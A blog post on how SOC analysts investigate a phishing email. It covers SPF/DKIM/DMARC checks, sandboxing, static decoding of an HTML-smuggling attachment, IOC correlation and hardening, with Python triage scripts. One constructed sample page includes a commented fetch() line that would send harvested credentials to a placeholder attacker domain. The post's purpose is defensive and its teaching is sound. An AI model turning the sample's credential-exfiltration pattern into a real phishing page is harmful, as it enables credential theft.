
Inside the Mind of a SOC Analyst: A Deep Dive into Phishing Email Analysis

  • Writer: Akshay Jain
  • Jul 7
  • 3 min read

Despite decades of awareness campaigns, phishing remains the No. 1 initial access vector in cyberattacks, whether the end result is a ransomware outbreak, business email compromise (BEC), or nation-state espionage.

But behind every blocked or ignored phishing email is a team of blue-team defenders: Security Operations Center (SOC) analysts who tirelessly inspect headers, payloads, links, and behaviors to distinguish harmless spam from high-impact threats.

In this blog, we’ll walk you through the exact process a SOC analyst follows for phishing analysis, step by step. You’ll see technical breakdowns, real-world examples, detection rules, and blue team workflows, all designed to fortify your defenses and illuminate the hidden war happening in your inbox.

Phishing Email

What Does a Phishing Email Look Like?

Let’s look at a sample phishing email reported by a user to their internal security team:

Subject: Urgent Invoice – Action Required  
From: invoice@company-invoicing.com  
To: jane.doe@corporate.com  
Date: Mon, 10 June 2024 08:13:25 -0500  
Attachment: invoice_10882.htm

Phase 1: Header Analysis – Who Really Sent This?

The first step in the analysis is to review the email headers. These contain vital metadata such as source IP, authentication results, and delivery paths.

Key Header Fields to Analyze:

  1. Return-Path vs. From

From: invoice@company-invoicing.com  
Return-Path: spammer@badvilla.ru

The Return-Path is the envelope sender that bounces go to; when its domain differs from the From header the displayed sender is almost certainly forged.

  2. SPF, DKIM, and DMARC Results

Authentication-Results:
 spf=fail smtp.mailfrom=badvilla.ru
 dkim=none
 dmarc=fail

Failed checks = high confidence in spoofing.

  3. Received Chains

Received: from [185.250.148.22] (unknown [185.250.148.22])

A GeoIP lookup on the originating IP shows a known spam node in Russia.
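The header checks above can be automated for first-pass triage. The script below is an added example (not code from the post or its author): it parses a constructed raw message modelled on the sample, compares the Return-Path and From domains, pulls the SPF/DKIM/DMARC verdicts out of Authentication-Results, and lists the IPs in the Received chain. The message text, the hostname mx.corporate.com and the ESMTP id are constructed; the scoring threshold is an assumption a real SOC would tune.

```python
"""Header triage for a user-reported phishing email (added example, not from the blog post)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed raw headers modelled on the post's sample; mx.corporate.com and the id are made up.
SAMPLE_HEADERS = """\
Return-Path: <spammer@badvilla.ru>
Received: from [185.250.148.22] (unknown [185.250.148.22])
 by mx.corporate.com with ESMTP id abc123
 for <jane.doe@corporate.com>; Mon, 10 Jun 2024 08:13:25 -0500
Authentication-Results: mx.corporate.com;
 spf=fail smtp.mailfrom=badvilla.ru;
 dkim=none;
 dmarc=fail header.from=company-invoicing.com
From: invoice@company-invoicing.com
To: jane.doe@corporate.com
Subject: Urgent Invoice - Action Required
Date: Mon, 10 Jun 2024 08:13:25 -0500

(body omitted)
"""


def domain_of(addr: str) -> str:
    """Return the lowercase domain of an address such as 'Name <user@host>'."""
    _, email_addr = parseaddr(addr)
    return email_addr.rpartition("@")[2].lower()


def parse_auth_results(value: str) -> dict:
    """Pull the spf/dkim/dmarc verdicts out of an Authentication-Results header."""
    results = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", value)
        results[mech] = m.group(1).lower() if m else "missing"
    return results


def received_ips(msg) -> list:
    """IPv4 literals from all Received headers, newest hop first, de-duplicated."""
    ips = []
    for hdr in msg.get_all("Received", []):
        ips.extend(re.findall(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", hdr))
    return list(dict.fromkeys(ips))


def triage_headers(raw: str) -> dict:
    """Run the Phase 1 checks and return findings plus a coarse verdict."""
    msg = message_from_string(raw)
    from_domain = domain_of(msg.get("From", ""))
    return_path_domain = domain_of(msg.get("Return-Path", ""))
    auth = parse_auth_results(msg.get("Authentication-Results", ""))

    findings = []
    if return_path_domain and return_path_domain != from_domain:
        findings.append(f"Return-Path domain {return_path_domain} differs from From domain {from_domain}")
    for mech, verdict in auth.items():
        if verdict != "pass":
            findings.append(f"{mech.upper()} result is '{verdict}'")

    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "auth": auth,
        "source_ips": received_ips(msg),  # feed these to GeoIP / threat intel next
        "findings": findings,
        # Assumed threshold: sender mismatch plus two or more failed checks = likely spoofed
        "verdict": "likely spoofed" if len(findings) >= 3 else "needs review",
    }


if __name__ == "__main__":
    for key, val in triage_headers(SAMPLE_HEADERS).items():
        print(f"{key}: {val}")
```

The Received chain is read newest-hop-first, so the last IP in the list is the one closest to the true origin; that is the one worth a GeoIP and reputation lookup.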

Phase 2: Attachment or Link Inspection

The user-reported email contains a suspicious .htm file, a common phishing tactic used to bypass attachment filters.


Step 1: Sandbox or Detonation

Tools:

  • Cuckoo Sandbox

  • ANY.RUN

  • Joe Sandbox

Behavior observed:

  • File opens a fake Microsoft login page.

  • JavaScript captures the victim’s credentials and sends them with fetch() to a C2 server.


Step 2: Static Analysis
  • Deobfuscate the JavaScript embedded in the .htm file. In many cases this reveals a credential harvesting page delivered via HTML smuggling, which email gateways often fail to detect.


Phase 3: URL Analysis and IOC Hunting


Extract URLs

  • From the HTML attachment or the email body, extract every URL for further analysis.

  • Use tools like:

    • urlscan.io

    • VirusTotal

    • Hybrid Analysis
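Static analysis of the .htm attachment (Phase 2, Step 2) and URL extraction (Phase 3) fit naturally in one script. The following is an added example, not code from the post or its author: it builds a constructed attachment in the HTML-smuggling style (an outer page whose only payload is a base64 blob handed to atob()), decodes the blob, extracts URLs from both layers, defangs them for the ticket, and flags the indicators an analyst looks for. The inner page is an inert fragment (a password field and a commented-out fetch reference), and the domain collect.badvilla.ru is constructed.

```python
"""Static triage of an HTML-smuggling attachment (added example, not from the blog post)."""
import base64
import re

# Constructed inner page the smuggled blob decodes to: inert fragment, not a working harvester.
_INNER_PAGE = (
    '<form><input name="user"><input type="password" name="pass"></form>'
    '<script>/* on submit: fetch("https://collect.badvilla.ru/post.php", ...) */</script>'
)
_BLOB = base64.b64encode(_INNER_PAGE.encode()).decode()

# Constructed .htm attachment: the outer page carries only a base64 blob and decodes it client-side.
SAMPLE_HTM = f"""<html><body>
<p>Loading invoice_10882...</p>
<a href="https://company-invoicing.com/view">View online</a>
<script>
var page = atob("{_BLOB}");
document.write(page);
</script>
</body></html>"""

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>)]*)?")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(html: str) -> list:
    """Find long base64-looking runs and return those that decode to readable text."""
    decoded = []
    for blob in B64_RE.findall(html):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or binary: leave it for the sandbox
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            decoded.append(text)
    return decoded


def extract_urls(text: str) -> list:
    """Unique http(s) URLs in order of appearance."""
    return list(dict.fromkeys(URL_RE.findall(text)))


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked by accident in a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def analyze_htm(html: str) -> dict:
    """Decode hidden layers, collect URLs from every layer and score the attachment."""
    layers = decode_blobs(html)
    urls = extract_urls(html)
    for layer in layers:
        urls.extend(u for u in extract_urls(layer) if u not in urls)
    indicators = {
        "uses_atob": "atob(" in html,
        "hidden_layers": len(layers),
        "password_field": any('type="password"' in layer for layer in layers),
        "posts_to_remote": any("fetch(" in layer or "XMLHttpRequest" in layer for layer in layers),
    }
    if indicators["uses_atob"] and indicators["password_field"]:
        verdict = "credential harvesting via HTML smuggling"
    else:
        verdict = "review manually"
    return {
        "indicators": indicators,
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = analyze_htm(SAMPLE_HTM)
    print(result["verdict"])
    for u in result["defanged"]:
        print("  ", u)
```

The URL found only inside the decoded layer is the one a gateway scanning the raw attachment never sees, which is exactly why the decoding step matters before the URLs go to urlscan.io or VirusTotal.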


Phase 4: Correlation with Threat Intel

  • SOC analysts pivot to CTI sources like:

    • MISP or OpenCTI

    • Threat feeds (AlienVault OTX, Abuse.ch)

    • Past incident cases

to check whether the IP addresses, URLs, or other indicators have been seen before in any campaign.


Blue Team Workflow: Phishing Email Analysis Process

Step-by-Step SOC Workflow

  • Alert triggered via email filter or user report.

  • Header review → Check SPF, DKIM, DMARC, Return-Path.

  • Attachment sandboxed → Check for credential harvesting or malware.

  • URLs analyzed → Cross-check with threat intel.

  • Extract IOCs → IPs, hashes, domains.

  • Pivot in SIEM:

    • Any other users who clicked?

    • Similar sender seen before?

  • Containment:

    • Block domain/IP via proxy or firewall.

    • Add email subject/hash to spam rules.

  • Response:

    • Notify affected users.

    • Update detection rules.

  • Documentation & RCA in ticketing platform or SOAR.
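The threat-intel correlation (Phase 4) and the SIEM pivot in the workflow above come down to joining the case indicators against two data sets: a feed of known-bad indicators and your own proxy or mail logs. The script below is an added example, not code from the post or its author. The indicator set, the feed entries (shaped loosely like a pared-down MISP/OTX export), the campaign name and the proxy log lines are all constructed; the user names and hosts are fictional.

```python
"""IOC correlation and SIEM-style pivot for a phishing case (added example, not from the blog post)."""
from collections import defaultdict

# Constructed indicators extracted in Phases 1-3 of the case; none of these are real IOCs.
CASE_IOCS = {
    "ips": {"185.250.148.22"},
    "domains": {"company-invoicing.com", "collect.badvilla.ru", "badvilla.ru"},
}

# Constructed local threat-intel snapshot; campaign name is made up.
THREAT_FEED = [
    {"value": "185.250.148.22", "type": "ip", "campaign": "constructed-invoice-lure-2024"},
    {"value": "badvilla.ru", "type": "domain", "campaign": "constructed-invoice-lure-2024"},
]

# Constructed proxy log (CSV: timestamp,user,dest_host,url,action); users are fictional.
PROXY_LOG = """\
2024-06-10T13:14:02Z,jane.doe,company-invoicing.com,https://company-invoicing.com/view,ALLOWED
2024-06-10T13:14:09Z,jane.doe,collect.badvilla.ru,https://collect.badvilla.ru/post.php,ALLOWED
2024-06-10T13:20:41Z,bob.smith,company-invoicing.com,https://company-invoicing.com/view,ALLOWED
2024-06-10T13:31:55Z,eve.adams,docs.example.com,https://docs.example.com/policy,ALLOWED
"""


def parent_domains(host: str):
    """Yield host and each parent domain (but not the bare TLD), so a feed entry for
    badvilla.ru also matches collect.badvilla.ru."""
    parts = host.lower().split(".")
    for i in range(len(parts) - 1):
        yield ".".join(parts[i:])


def match_threat_feed(iocs: dict, feed: list) -> dict:
    """Map each case indicator that is known to the feed onto the campaign it belongs to."""
    index = {(e["type"], e["value"].lower()): e for e in feed}
    hits = {}
    for ip in iocs["ips"]:
        if ("ip", ip) in index:
            hits[ip] = index[("ip", ip)]["campaign"]
    for domain in iocs["domains"]:
        for candidate in parent_domains(domain):
            if ("domain", candidate) in index:
                hits[domain] = index[("domain", candidate)]["campaign"]
                break
    return hits


def pivot_proxy_log(log_text: str, iocs: dict) -> dict:
    """Every user whose proxy traffic touched a case domain, with the matching events."""
    exposed = defaultdict(list)
    for line in log_text.splitlines():
        ts, user, host, url, action = line.split(",")
        if any(d in iocs["domains"] for d in parent_domains(host)):
            exposed[user].append((ts, url, action))
    return dict(exposed)


def build_case_summary(iocs: dict, feed: list, log_text: str, reporter: str) -> dict:
    """Pull the correlation and pivot results into what the ticket and containment steps need."""
    intel = match_threat_feed(iocs, feed)
    exposure = pivot_proxy_log(log_text, iocs)
    return {
        "known_campaigns": sorted(set(intel.values())),
        "matched_indicators": sorted(intel),
        "users_to_notify": sorted(exposure),
        "other_clickers": sorted(u for u in exposure if u != reporter),
        # input for the containment step: block at proxy/firewall
        "block_list": sorted(iocs["domains"] | iocs["ips"]),
    }


if __name__ == "__main__":
    for key, val in build_case_summary(CASE_IOCS, THREAT_FEED, PROXY_LOG, reporter="jane.doe").items():
        print(f"{key}: {val}")
```

Matching on parent domains is the part worth copying: feeds usually list the registrable domain while logs show the full host the victim actually reached, and a naive exact match between the two would miss the credential-submission request entirely.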


Prevention & Hardening Tips

  • Block .htm, .html, and .iso files in email attachments.

  • Enforce SPF, DKIM, and DMARC at reject policy.

  • Use sandbox-based email security tools (e.g., Proofpoint, FireEye EX).

  • Train users to report phishing via a one-click button.

  • Implement browser isolation for links from external emails.

  • Enable MFA to minimize impact of stolen credentials.


Bonus: Red Flags for Non-Technical Users

Help your employees spot phishing emails:

  • Unusual sender domain (e.g., m1crosoft.com)

  • Generic greeting: “Dear Customer”

  • Urgent tone: “Account will be disabled!”

  • Unexpected attachments

  • Slightly off URLs (hover to check)


Phishing emails may appear harmless, but they are the first domino in devastating cyberattacks. SOC analysts play a critical role in analyzing, detecting, and containing these threats with precision.

By dissecting headers, decoding payloads, analyzing URLs, and correlating IOCs, blue teams can not only stop the attack but also learn from it, adapt, and build a resilient defense.


Stay curious. Stay secure. 🚀


Note: Feel free to drop your thoughts in the comments below, whether it's feedback, a topic you'd love to see covered, or just to say hi! Don’t forget to join the forum for more engaging discussions and stay updated with the latest blog posts. Let’s keep the conversation going and make cybersecurity a community effort!


-AJ
